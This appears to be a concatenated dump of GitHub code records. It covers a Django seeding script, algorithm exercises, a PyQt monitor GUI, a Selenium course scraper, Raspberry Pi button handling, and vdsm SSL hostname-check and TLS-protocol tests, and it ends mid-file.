chef2.save()\n chef2.groups.add(Group.objects.get(name='Chef'))\n chef2.user_permissions.add(Permission.objects.get(name='Free'))\n\n print('Chefs created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n monitor1 = Monitor(\n username='monitor1',\n email='monitor1@monitor1.com',\n first_name='monitor1',\n )\n monitor1.set_password('monitor1')\n monitor1.save()\n monitor1.groups.add(Group.objects.get(name='Monitor'))\n monitor1.user_permissions.add(Permission.objects.get(name='Free'))\n\n monitor2 = Monitor(\n username='monitor2',\n email='monitor2@monitor2.com',\n first_name='monitor2',\n )\n monitor2.set_password('monitor2')\n monitor2.save()\n monitor2.groups.add(Group.objects.get(name='Monitor'))\n monitor2.user_permissions.add(Permission.objects.get(name='Free'))\n\n print('Monitors created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n manager1 = Manager(\n username='manager1',\n email='manager1@manager1.com',\n first_name='manager1',\n )\n manager1.set_password('manager1')\n manager1.save()\n manager1.groups.add(Group.objects.get(name='Manager'))\n manager1.user_permissions.add(Permission.objects.get(name='Free'))\n\n manager2 = Manager(\n username='manager2',\n email='manager1@manager2.com',\n first_name='manager2',\n )\n manager2.set_password('manager2')\n manager2.save()\n manager2.groups.add(Group.objects.get(name='Manager'))\n manager2.user_permissions.add(Permission.objects.get(name='Free'))\n\n print('Managers created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n activity1 = Activity(\n name='activity1',\n description='activity1Description',\n place='activity1Place',\n latitude=10.0,\n longitude=10.0,\n start_date='2017-3-5',\n price_per_person=6,\n end_date='2017-7-29',\n owner=monitor1\n )\n activity1.save()\n activity1.assistants.add(guest1)\n activity1.assistants.add(guest2)\n\n activity2 = Activity(\n name='activity2',\n description='activity2Description',\n place='activity2Place',\n latitude=10.0,\n longitude=10.0,\n start_date='2010-3-15',\n end_date='2017-7-29',\n price_per_person=6,\n owner=monitor2,\n )\n activity2.save()\n activity2.assistants.add(guest1)\n\n print('Activities... ok')\n # ==================================================================================================\n # ==================================================================================================\n\n local1 = Local(\n name='local1',\n description='description',\n address='address1',\n latitude=10.00,\n longitude=12.00,\n manager=manager1)\n local1.save()\n\n local2 = Local(\n name='local2',\n description='description',\n address='address2',\n latitude=10.00,\n longitude=12.00,\n manager=manager2)\n local2.save()\n\n print('Locals... Ok')\n\n # ==================================================================================================\n # Dish\n # ==================================================================================================\n\n dish1 = Dish(name='dish1', description='dish1Description', date='2017-02-5', hour='12:00', owner=chef1,\n max_assistants=3, contribution=5.6,\n photo='http://valenciaoberta.es/wp-content/uploads/2016/08/paella-2.jpg')\n dish1.save()\n dish1.assistants.add(guest1)\n dish1.assistants.add(guest2)\n dish2 = Dish(name='dish2', description='dish2Description', date='2017-03-15', hour='13:00', owner=chef1,\n max_assistants=3, contribution=4.0)\n dish2.save()\n dish3 = Dish(name='dish3', description='dish3Description', date='2017-03-25', hour='14:00', owner=chef2,\n max_assistants=1, contribution=2.0)\n dish3.save()\n dish4 = Dish(name='dish4', description='dish4Description', date='2017-08-29', hour='14:00', owner=chef2,\n max_assistants=5, contribution=5.0)\n dish4.save()\n dish5 = Dish(name='dish5', description='dish5Description', date='2017-8-25', hour='15:00', owner=chef2,\n max_assistants=10, contribution=3.6)\n dish5.save()\n\n print('Dishes... Ok')\n\n print('Populating database...OK\\n'\n 'Ready to use!')\n\n def handle(self, *args, **options):\n self._migrate()\n","repo_name":"andreslopezalbin/NetMeals","sub_path":"netmeals/management/commands/populatedb.py","file_name":"populatedb.py","file_ext":"py","file_size_in_byte":9325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"39411687751","text":"from BaseSolution import *\nfrom ListNode import *\nclass LinkedListCycle(BaseSolution):\n def __init__(self):\n BaseSolution.__init__(self)\n\n def solution(self, head):\n if not head: return False\n newHead = ListNode(-1)\n newHead.next = head\n slow = newHead\n fast = newHead.next\n while slow and fast and fast.next:\n if slow == fast: return True\n slow = slow.next\n fast = fast.next.next\n return False\n\n","repo_name":"caunion/leetcode","sub_path":"solutions/LinkedListCycle.py","file_name":"LinkedListCycle.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11308948400","text":"print('2자리의 양수를 입력하세요.')\n\nwhile True:\n no = int(input('값을 입력하세요.: '))\n if not(no < 10 or no > 99):\n break\n\nprint(f'입력받은 양수는 {no}입니다.')\n\n#De Morgan's law. If not 2 digit number, makes the user input again.","repo_name":"dennis1219/algorithm_study","sub_path":"python/01_basics/2digits1_de_morgan.py","file_name":"2digits1_de_morgan.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"13849217521","text":"import sys,os\nfrom PyQt5.QtWidgets import QLineEdit, QGridLayout,QLabel ,QPushButton,QCheckBox \nfrom PyQt5 import QtWidgets, QtGui, QtCore\nfrom PyQt5.QtCore import QTimer\nfrom logging.handlers import RotatingFileHandler\n\n\n\nimport logging\nfrom run import achia_logger\nimport yaml\n\n\n\n\nlogger = logging.getLogger()\nlogging.basicConfig(level=logging.INFO)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nlogger.addHandler(ch)\n# # create formatter\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n# # add formatter to ch\nch.setFormatter(formatter)\n\nfile_handler = RotatingFileHandler('achia-debug.log', maxBytes=2000, backupCount=10)\nfile_handler.setLevel(logging.DEBUG)\nfile_handler.setFormatter(formatter)\nlogger.addHandler(file_handler)\n\n\n# # if logger.handlers:\n# # print(logger.handlers)\n# # for hnd in logger.handlers:\n# # logger.removeHandler(hnd)\n\n# # add ch to logger\n\n\n\n\nlogger_gui = logging.getLogger()\nlogger_gui.setLevel(logging.DEBUG)\n# if logger_gui.handlers:\n# print(logger_gui.handlers)\n# for hnd in logger_gui.handlers:\n# logger_gui.removeHandler(hnd)\n# # You can control the logging level\n# logger_gui.setLevel(logging.DEBUG)\n\n\nclass QTextEditLogger(logging.Handler):\n def __init__(self, parent):\n super().__init__()\n self.widget = QtWidgets.QPlainTextEdit(parent)\n self.widget.setReadOnly(True)\n\n def emit(self, record):\n msg = self.format(record)\n self.widget.appendPlainText(msg)\n\n\nclass MyDialog(QtWidgets.QDialog, QtWidgets.QPlainTextEdit):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.current_directory = os.path.dirname(__file__)\n self.note_icon = os.path.join( self.current_directory,'img','logo.ico' )\n self.file_name = 'achia.yaml'\n\n try:\n f = open(self.file_name, 'r')\n self.config = yaml.load(stream=f, Loader=yaml.Loader)\n f.close() \n if not isinstance(self.config, dict):\n self.config = dict()\n except:\n self.config = dict()\n print(self.config)\n self.chia_logger = achia_logger() \n \n\n \n\n logTextBox = QTextEditLogger(self)\n logTextBox.setLevel(logging.INFO)\n\n # You can format what is printed to text box\n logTextBox.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))\n logger_gui.addHandler(logTextBox)\n\n grid = QGridLayout()\n grid.setSpacing(2)\n \n e1_lable = QLabel('Token')\n e2_lable = QLabel('Machine ID')\n e3_lable = QLabel('Plotting Logs Path')\n\n self.e1 = QLineEdit(self.config.get(\"TOKEN\",\"Token xxxxxxxxxxxxxxxxxx\"))\n self.e2 = QLineEdit(self.config.get(\"MACHINE_ID\",\"xxxxxx\"))\n self.e3 = QLineEdit(self.config.get(\"PLOTTING_LOGS_PATH\",\"\"))\n self.e3.setPlaceholderText(\"Put in the folder of the plotting logs\")\n label = QLabel()\n label.setText('<a href=\"https://achia.co\">https://achia.co</a>')\n label.setOpenExternalLinks(True)\n \n grid.addWidget(e1_lable, 1, 0, 1,1)\n grid.addWidget(self.e1, 1, 1, 1,4)\n\n grid.addWidget(e2_lable, 2, 0,1,1)\n grid.addWidget(self.e2, 2, 1,1,4)\n\n grid.addWidget(e3_lable, 3, 0,1,1)\n grid.addWidget(self.e3, 3, 1,1,4)\n \n \n logo = QLabel()\n logo.setPixmap(QtGui.QPixmap(os.path.join( self.current_directory,'img','logo-text.png' )).scaledToWidth(160))\n version = QLabel(\"Version: 0.2\")\n \n self.startBtn=QPushButton('Start')\n self.endBtn=QPushButton('Stop')\n \n sublayout1 = QtWidgets.QVBoxLayout()\n sublayout1.addWidget(logo, alignment=QtCore.Qt.AlignCenter)\n sublayout1.addWidget(label, alignment=QtCore.Qt.AlignCenter)\n sublayout1.addWidget(version, alignment=QtCore.Qt.AlignCenter)\n self.is_debug = QCheckBox(\"Save debug log\")\n self.is_debug.setChecked(True)\n sublayout1.addWidget(self.is_debug)\n sublayout1.addWidget(self.startBtn)\n sublayout1.addWidget(self.endBtn)\n \n grid.addLayout(sublayout1, 4, 0, 6, 1)\n grid.addWidget(logTextBox.widget,4, 1, 6, 4)\n \n self.startBtn.clicked.connect(self.start)\n self.endBtn.clicked.connect(self.end)\n \n\n \n self.setLayout(grid)\n self.setGeometry(800, 500, 800, 300)\n self.setWindowTitle('aChia Dash Monitor')\n self.setWindowIcon(QtGui.QIcon(self.note_icon)) \n self.timer=QTimer()\n self.timer.timeout.connect(self.run)\n \n self.chia_logger.config = self.config\n \n def get_value(self):\n self.config[\"TOKEN\"] = self.e1.text() \n self.config[\"MACHINE_ID\"] = self.e2.text()\n self.config[\"PLOTTING_LOGS_PATH\"] = self.e3.text()\n with open(self.file_name, 'w') as yaml_file:\n yaml.dump(self.config, yaml_file, default_flow_style=False)\n\n def run(self):\n self.chia_logger.run() \n \n def start(self):\n try:\n self.get_value()\n logging.info(\"***********Starting aChia Dash Monitor***********\")\n logging.info(f\"TOKEN = {self.config['TOKEN']}\" )\n logging.info(f\"MACHINE_ID = {self.config['MACHINE_ID']}\" )\n logging.info(f\"PLOTTING_LOGS_PATH = {self.config['PLOTTING_LOGS_PATH']}\" )\n logging.info(\"********************************************\" )\n self.is_debug.setEnabled(False)\n if self.is_debug.isChecked():\n logger_gui.setLevel(logging.DEBUG)\n logging.info(\"DEBUG is ON\" )\n else:\n logger_gui.setLevel(logging.INFO)\n logging.info(\"DEBUG is OFF\" )\n \n self.chia_logger.set_value()\n self.run() \n self.timer.start(60000)\n self.startBtn.setEnabled(False)\n self.endBtn.setEnabled(True)\n except Exception as e:\n logging.error(e)\n \n def end(self):\n logging.info(\"***********Stopped*********\" )\n self.timer.stop()\n self.startBtn.setEnabled(True)\n self.endBtn.setEnabled(False) \n self.is_debug.setEnabled(True)\n\n \n\n\n \nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n widget = MyDialog()\n widget.show()\n #widget.line_edit.setText('Text updated!')\n ret = sys.exit(app.exec_())\n sys.exit(ret)\n","repo_name":"achia-co/achia-dash","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":6519,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"} +{"seq_id":"9691561781","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\n\nchrome = webdriver.Chrome()\nchrome.implicitly_wait(10)\nchrome.get(\"http://study.foton.com.cn\")\nchrome.maximize_window()\ncategory_list = ['领导力学院', '工程学院', '制造学院', '营销学院', '金融学院', '其他专业课程', '国际学院', '通用类', '精品微课',\n '计划类(面授)课程', '主题学习', '生产管��学院', '事业部专有课程', '研发管理学院', '市场运营学院', '财务管理学院',\n '销售管理学院', '人力资源学院', '职业化学院', '领导力学院', '综合管理学院', '个人发展学院']\n\n\ndef login():\n account = input('请输入用户名:')\n password = input('请输入密码:')\n\n ele = chrome.find_element_by_id(\"loginName\")\n ele.click()\n ele.send_keys(account)\n\n ele = chrome.find_element_by_id(\"password\")\n ele.click()\n ele.send_keys(password)\n\n time.sleep(1)\n ele = chrome.find_element_by_css_selector(\"#fm1 > input.btn.btn-block.btn-primary.btn-lg\")\n ele.click()\n\n\ndef find_courses_data():\n with open('course_data.txt', 'w', encoding='utf-8') as f:\n f.write('课程名称,')\n f.write('课程ID,')\n f.write('课程学分,')\n f.write('结业条件\\n')\n chrome.switch_to.frame(chrome.find_element_by_xpath('/html/body/div[2]/div[4]/div[2]/iframe'))\n time.sleep(3)\n # above = chrome.find_element_by_partial_link_text(\"学习中心\")\n study_center = WebDriverWait(chrome, 15, 0.5).until(\n EC.presence_of_element_located((By.PARTIAL_LINK_TEXT, '学习中心')))\n time.sleep(1)\n ActionChains(chrome).move_to_element(study_center).perform()\n time.sleep(2)\n # above = chrome.find_element_by_link_text(\"课程中心\")\n course_center = WebDriverWait(chrome, 15, 0.5).until(\n EC.presence_of_element_located((By.PARTIAL_LINK_TEXT, '课程中心')))\n course_center.click()\n chrome.switch_to.default_content()\n time.sleep(2)\n chrome.switch_to.frame(chrome.find_element_by_id('tbc_window_iframe_19'))\n time.sleep(2)\n for category in category_list:\n # ele = chrome.find_element_by_partial_link_text(category)\n ele = WebDriverWait(chrome, 15, 0.5).until(\n EC.presence_of_element_located((By.PARTIAL_LINK_TEXT, category)))\n ele.click()\n time.sleep(2)\n try:\n last_page = int(chrome.find_element_by_class_name('pagnum-last').text)\n except:\n last_page = 1\n for i in range(1, last_page+1):\n cp = 1\n # ele = chrome.find_element_by_id('categoryFilterResult')\n time.sleep(1)\n ele = WebDriverWait(chrome, 15, 0.5).until(\n EC.presence_of_element_located((By.ID, 'categoryFilterResult'))\n )\n # ul = ele.find_element_by_tag_name('ul')\n ul = WebDriverWait(ele, 15, 0.5).until(\n EC.presence_of_element_located((By.TAG_NAME, 'ul'))\n )\n # li_list = ul.find_elements_by_tag_name('li')\n li_list = WebDriverWait(ul, 15, 0.5).until(\n EC.presence_of_all_elements_located((By.TAG_NAME, 'li'))\n )\n for li in li_list:\n time.sleep(0.2)\n # div = li.find_element_by_class_name('list-p')\n div = WebDriverWait(li, 15, 0.5).until(\n EC.presence_of_element_located((By.CLASS_NAME, 'list-p')))\n # h3 = div.find_element_by_tag_name('h3')\n h3 = WebDriverWait(div, 15, 0.5).until(\n EC.presence_of_element_located((By.TAG_NAME, 'h3')))\n course_name = h3.text\n f.write(course_name + ',')\n course_id = h3.get_attribute('data-id')\n f.write(course_id + ',')\n detial_list = div.find_elements_by_class_name('learndetail')\n detial_credit = detial_list[0]\n # 这里的credit是str类型\n credit = detial_credit.find_elements_by_tag_name('span')[1].find_element_by_tag_name('em').text\n f.write(credit)\n f.write(',')\n completion = div.find_element_by_class_name('coursebrief').find_element_by_tag_name('em').text\n f.write(completion + '\\n')\n if last_page > 1:\n if cp < last_page:\n # next_page = chrome.find_element_by_class_name('pag-next-page')\n next_page = WebDriverWait(chrome, 30, 0.5).until(\n EC.presence_of_element_located((By.PARTIAL_LINK_TEXT, '下一页')))\n next_page.click()\n cp += 1\n time.sleep(3)\n\n\nif __name__ == \"__main__\":\n login()\n find_courses_data()\n chrome.quit()\n\n\n\n\n","repo_name":"Idealisten/OneClickToLearnFotonUniversityOnlineStudyPlatform","sub_path":"GetAllCourseData.py","file_name":"GetAllCourseData.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"26601972307","text":"# currently set to nsims = 250 and dirlimit = 25; reset to 2500 and 250 for production runs\n\nimport os\nfrom math import ceil\nfrom string import ascii_lowercase as letters\n\nimport numpy as np\nimport pandas as pd\nimport InterruptionAnalysis as ia\nimport Independent as sim\n\nnp.random.seed(12345)\n\n# import reference data and convert time step to 1/10th second\ndata = pd.read_csv('./data/timeseries.csv', index_col = 0)\nnumeric_cols = ['begin', 'end', 'dur', 'lat']\nfor col in numeric_cols:\n data[col] = data[col]/100\n\n# keep only those agents analyzed in the DHVg analysis: those with |x| >= 20\nsample = list(data.groupby(\"pID\")[\"dur\"].count().loc[lambda x: x >= 20].index)\n\n# estimate /p/ and /q/ for each r_i and collect it into a data frame indexed by pID with columns \"p\" and \"q\"\nrows = {}\nfor pID in sample:\n P_i = ia.get_transition_matrix(data, pID)\n p = P_i[0, 1]\n q = P_i[1, 0]\n rows[pID] = [p, q]\nP = pd.DataFrame.from_dict(rows, orient = \"index\", columns = [\"p\", \"q\"])\n\n# sim parameters for all sims\nnsims = 250\n\n####\n## Timer Code\n## prints to stdout the time it takes to simulate one reference individual nsims times\n## does not save any data\n# import time\n# time1 = time.time()\n# pID = np.random.choice(sample)\n# row = P[P.index.isin([pID])]\n# P_i = np.array([[1 - row[\"p\"], row[\"p\"]], [row[\"q\"], 1 - row[\"q\"]]])\n# gID = pID[:3]\n# T = round(data[data[\"gID\"] == gID][\"end\"].max())\n# # these two are the same for all in this file, but would change otherwise\n# N = 1\n# ns = list(range(N))\n# for run in range(nsims):\n# Y = sim.simulation(P_i, T, N, ns, oneagent = True)\n# X = ia.Y_to_X(Y, ns)\n# time2 = time.time()\n# print(time2 - time1)\n## end timer code\n####\n\n# prepare subdirectory structure\n# separate sims into subdirectories to speed file lookup\nsavepath = \"./data/simulations/mimic-agents\"\nif not os.path.isdir(savepath):\n os.mkdir(savepath)\ndirlimit = 25\nnsubdirs = ceil(nsims/dirlimit)\n\n# main loop\nfor pID in sample:\n print(pID)\n # select reference individual and associated transition matrix\n row = P[P.index.isin([pID])]\n P_i = np.array([[1 - row[\"p\"], row[\"p\"]], [row[\"q\"], 1 - row[\"q\"]]])\n \n # set sim parameters for this sim\n gID = pID[:3]\n T = round(data[data[\"gID\"] == gID][\"end\"].max())\n # these two are the same for all in this file, but would change otherwise\n N = 1\n ns = list(range(N))\n\n # prepare subdirectories for this pID\n pidpath = savepath + f\"/{pID}\"\n if not os.path.isdir(pidpath):\n os.mkdir(pidpath)\n for i in range(nsubdirs):\n subpath = f\"{pidpath}/{letters[i]}\"\n if not os.path.isdir(subpath):\n os.mkdir(subpath)\n\n # run the sims\n pointer = 0\n subdir = letters[pointer]\n for run in range(nsims):\n if run > 0 and run % dirlimit == 0:\n pointer += 1\n subdir = letters[pointer]\n Y = sim.simulation(P_i, T, N, ns, oneagent = True)\n X = ia.Y_to_X(Y, ns)\n # and store them in the appropriate place\n X.to_csv(f\"{pidpath}/{subdir}/{pID}-{run}.csv\")\n\n","repo_name":"ngmaclaren/interruption-abm","sub_path":"generate-mimic-agents.py","file_name":"generate-mimic-agents.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1431386758","text":"\"\"\"Urls for feedgrabber categories\"\"\"\nfrom django.conf.urls.defaults import *\n\nfrom feedgrabber.models import Category\n\ncategory_conf = {'queryset': Category.objects.all()}\n\nurlpatterns = patterns('django.views.generic.list_detail',\n url(r'^$', 'object_list',\n category_conf, 'feedgrabber_category_list'),\n )\n\nurlpatterns += patterns('feedgrabber.views.categories',\n url(r'^(?P<slug>[-\\w]+)/$', 'view_category_detail',\n name='feedgrabber_category_detail'),\n )\n","repo_name":"Fantomas42/django-feedgrabber","sub_path":"feedgrabber/urls/categories.py","file_name":"categories.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"16"} +{"seq_id":"2844467872","text":"import RPi.GPIO as GPIO\nfrom time import sleep\nfrom socketIO_client import SocketIO, BaseNamespace\nfrom config import CLIENT_HOST, PORT, RPiConfig\n\nsio = SocketIO(CLIENT_HOST, PORT)\nispace = sio.define(BaseNamespace, '/input')\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\n\ntry:\n GPIO.setup([RPiConfig.LEFT_BUTTON_PIN, RPiConfig.RIGHT_BUTTON_PIN], GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.setup([RPiConfig.LEFT_DIOD_PIN, RPiConfig.RIGHT_DIOD_PIN], GPIO.OUT, initial = GPIO.LOW)\n while True:\n if GPIO.input(RPiConfig.LEFT_BUTTON_PIN):\n GPIO.output(RPiConfig.LEFT_DIOD_PIN, GPIO.HIGH)\n ispace.emit('button pressed', {'data': '1'})\n sleep(RPiConfig.DIOD_TIMEOUT)\n GPIO.output(RPiConfig.LEFT_DIOD_PIN, GPIO.LOW)\n if GPIO.input(RPiConfig.RIGHT_BUTTON_PIN):\n GPIO.output(RPiConfig.RIGHT_DIOD_PIN, GPIO.HIGH)\n ispace.emit('button pressed', {'data': '2'})\n sleep(RPiConfig.DIOD_TIMEOUT)\n GPIO.output(RPiConfig.RIGHT_DIOD_PIN, GPIO.LOW)\n sleep(0.05)\nfinally:\n GPIO.cleanup()\n","repo_name":"ivellios/familiaria","sub_path":"buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27894501167","text":"#!/usr/bin/python3\n\nimport hidden_4\n\n\ndef main():\n \"\"\"Get the names that are in the file using the dir() function.\n Go through each name to make sure that only the ones\n that do not start with '__' are stored in the names list.\n Print each name from the sorted list of names.\n Sorting will be handled with the sorted() method\n \"\"\"\n\n names = [name for name in dir(hidden_4) if not name.startswith('__')]\n\n for name in sorted(names):\n print(name)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ShawnZain/alx-higher_level_programming","sub_path":"0x02-python-import_modules/4-hidden_discovery.py","file_name":"4-hidden_discovery.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74061969929","text":"import apprise\n\nimport logging\n\nlog = logging.getLogger('apprise')\n\n\nclass Apprise:\n NAME = \"Apprise\"\n\n def __init__(self, url, title='Cloudplow'):\n self.url = url\n self.title = title\n log.debug(\"Initialized Apprise notification agent\")\n\n def send(self, **kwargs):\n if not self.url:\n log.error(\"You must specify a URL when initializing this class\")\n return False\n\n # send notification\n try:\n apobj = apprise.Apprise()\n apobj.add(self.url)\n apobj.notify(\n title=self.title,\n body=kwargs['message'],\n )\n\n except Exception:\n log.exception(f\"Error sending notification to {self.url}\")\n return False\n","repo_name":"l3uddz/cloudplow","sub_path":"utils/notifications/apprise.py","file_name":"apprise.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":329,"dataset":"github-code","pt":"16"} +{"seq_id":"75045815","text":"import random\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\nimport time\r\n\r\nclass Reservoir:\r\n def __init__(self,k): #k개 샘플링하겠다.\r\n self.sampled = []\r\n self.k = k\r\n self.cnt =0 # 몇 번째로 들어온 아이템인지 나타내는 변수\r\n\r\n def put(self, item): #스트림에서 item 하나가 reservoir sampled로 들어옴\r\n if self.cnt < self.k: # k개 이하로 들어올 경우 : 배열에 그냥 추가\r\n self.sampled.append(item)\r\n else: # k개 이상이 들어왔을 경우 : r<k일 때만 r번째 값을 item으로 대체\r\n r = random.randint(0,self.cnt)\r\n if r<self.k:\r\n self.sampled[r] = item\r\n self.cnt += 1\r\n\r\nclass ReservoirWithReplacement: #복원추출을 위한 클래스\r\n def __init__(self,k2):\r\n self.k2 = k2\r\n\r\n def create(self,stream):\r\n for i in range(self.k2):\r\n self.reservoir = Reservoir(1) #크기 1짜리 Reservoir k번 돌리기\r\n for j in range(stream):\r\n self.reservoir.put(j)\r\n print(j,' : ',self.reservoir.sampled)\r\n arr.append(self.reservoir.sampled)\r\n\r\narr=[]\r\nfor i in tqdm(range(10000)):\r\n reservoir_replacement = ReservoirWithReplacement(100) #100개의 값을 추출\r\n reservoir_replacement.create(1000) #0 부터 999 까지의 숫자 입력\r\n\r\n# 추출횟수 구하기\r\ncnt=[0 for i in range(1000)]\r\nfor i in range(len(arr)):\r\n for j in range(len(arr[i])):\r\n cnt[arr[i][j]]+=1\r\nprint(\"cnt : \", cnt)\r\n\r\n# 시각화\r\nplt.plot([i for i in range(1000)], cnt)\r\nplt.show()","repo_name":"skm0626/Algorithm","sub_path":"bigdata_2022/hw1-2_ReservoirWithReplacement.py","file_name":"hw1-2_ReservoirWithReplacement.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15828955305","text":"def find_element(nums, target):\n length = len(nums)\n st = 0\n ed = length-1\n while st < ed:\n mid = (st + ed + 1) // 2\n if nums[mid][1] > target:\n ed = mid - 1\n else:\n st = mid\n return nums[st]\n\ndef UptimalUtilization(a, b, target):\n a.sort(key=lambda x:x[1])\n b.sort(key=lambda x:x[1])\n len1 = len(a)\n len2 = len(b)\n curval = 0\n res = []\n for idx1, num1 in a:\n idx2, num2 = find_element(b,target-num1)\n if num1 + num2 <= target:\n print(num1+num2)\n if curval < num1 + num2:\n curval = num1 + num2\n res = [[idx1, idx2]]\n elif curval == num1 + num2:\n res.append([idx1, idx2])\n return res\n\n\na = [[1, 2], [2, 4], [3, 6]]\nb = [[1, 2]]\ntarget = 7\n#print(UptimalUtilization(a, b, target))\n\n\nprint (UptimalUtilization([(1,2000),(2,3000),(3,6000)],\n\t [(1,2000)], 7000))\n","repo_name":"SrilakshmiSripathi/Data_Structures_and_Algorithms_Practice","sub_path":"DataStructures/Assorted/airtime3.py","file_name":"airtime3.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70574112007","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport socket\n\nimport pytest\n\nfrom vdsm.common import cmdutils\nfrom vdsm.common import concurrent\nfrom vdsm.common import commands\nfrom vdsm.protocoldetector import MultiProtocolAcceptor\nfrom vdsm.sslutils import SSLContext, SSLHandshakeDispatcher\nfrom yajsonrpc.betterAsyncore import Reactor\n\nfrom integration.sslhelper import key_cert_pair # noqa: F401\n\n\n@pytest.fixture\ndef fake_gethostbyaddr(monkeypatch, request):\n entry = getattr(request, 'param', None)\n if entry is not None:\n hostname, ipaddrlist = entry\n\n def impl(addr):\n if addr not in ipaddrlist:\n raise socket.herror()\n return (hostname, [], ipaddrlist)\n\n monkeypatch.setattr('vdsm.sslutils.socket.gethostbyaddr', impl)\n\n\n@pytest.mark.parametrize('fake_gethostbyaddr', [('example.com', ['10.0.0.1'])],\n indirect=True)\ndef test_same_string(fake_gethostbyaddr):\n assert SSLHandshakeDispatcher.compare_names('10.0.0.1', 'example.com')\n\n\n@pytest.mark.parametrize('lhs,rhs', [('::ffff:127.0.0.1', '127.0.0.1'),\n ('127.0.0.1', '::ffff:127.0.0.1')])\ndef test_mapped_address(lhs, rhs):\n assert SSLHandshakeDispatcher.compare_names(lhs, rhs)\n\n\n@pytest.mark.parametrize('fake_gethostbyaddr', [('example.com', ['10.0.0.1'])],\n indirect=True)\ndef test_failed_mapped_address(fake_gethostbyaddr):\n assert not SSLHandshakeDispatcher.compare_names('10.0.0.1',\n '::ffff:127.0.0.1')\n\n\n@pytest.mark.parametrize('fake_gethostbyaddr',\n [('example.com', ['10.0.0.1', '10.0.0.2'])],\n indirect=True)\ndef test_multiple(fake_gethostbyaddr):\n assert SSLHandshakeDispatcher.compare_names('10.0.0.2', 'example.com')\n\n\n@pytest.mark.parametrize('fake_gethostbyaddr',\n [('evil.imposter.com', ['10.0.0.1'])],\n indirect=True)\ndef test_imposter(fake_gethostbyaddr):\n assert not SSLHandshakeDispatcher.compare_names('10.0.0.1', 'example.com')\n\n\n@pytest.mark.parametrize('lhs,rhs', [('127.0.0.1', 'example.com'),\n ('::1', 'example.com'),\n ('::ffff:127.0.0.1', 'example.com')])\ndef test_local_addresses(lhs, rhs):\n assert SSLHandshakeDispatcher.compare_names(lhs, rhs)\n\n\n@pytest.fixture\ndef dummy_register_protocol_detector(monkeypatch):\n monkeypatch.setattr(MultiProtocolAcceptor, '_register_protocol_detector',\n lambda d: d.close())\n\n\n@pytest.fixture # noqa: F811 # TODO: remove after upgrading flake to 3.9.2\ndef listener(dummy_register_protocol_detector, key_cert_pair, request): # noqa: F811, E501\n key_file, cert_file = key_cert_pair\n reactor = Reactor()\n\n sslctx = SSLContext(cert_file=cert_file, key_file=key_file,\n ca_certs=cert_file)\n\n acceptor = MultiProtocolAcceptor(\n reactor,\n '127.0.0.1',\n 0,\n sslctx=sslctx\n )\n\n try:\n t = concurrent.thread(reactor.process_requests)\n t.start()\n (host, port) = acceptor._acceptor.socket.getsockname()[0:2]\n yield (host, port)\n finally:\n acceptor.stop()\n reactor.stop()\n t.join()\n\n\n@pytest.fixture # noqa: F811 # TODO: remove after upgrading flake to 3.9.2\ndef client_cmd(listener, key_cert_pair): # noqa: F811\n key_file, cert_file = key_cert_pair\n\n def wrapper(protocol):\n (host, port) = listener\n cmd = ['openssl', 's_client', '-connect', '%s:%s' % (host, port),\n '-CAfile', cert_file, '-cert', cert_file, '-key', key_file,\n protocol]\n return commands.run(cmd)\n\n return wrapper\n\n\n@pytest.mark.parametrize('protocol', [\n pytest.param(\n '-ssl2',\n id='ssl2'\n ),\n pytest.param(\n '-ssl3',\n id='ssl3'\n ),\n pytest.param(\n '-tls1',\n id='tls1'\n ),\n pytest.param(\n '-tls1_1',\n id='tls1.1'\n )\n])\ndef test_tls_unsupported_protocols(client_cmd, protocol):\n with pytest.raises(cmdutils.Error):\n client_cmd(protocol)\n\n\n@pytest.mark.parametrize('protocol', [\n pytest.param(\n '-tls1_2',\n id='tls1.2'\n ),\n])\ndef test_tls_protocols(client_cmd, protocol):\n assert b\"Verify return code: 0 (ok)\" in 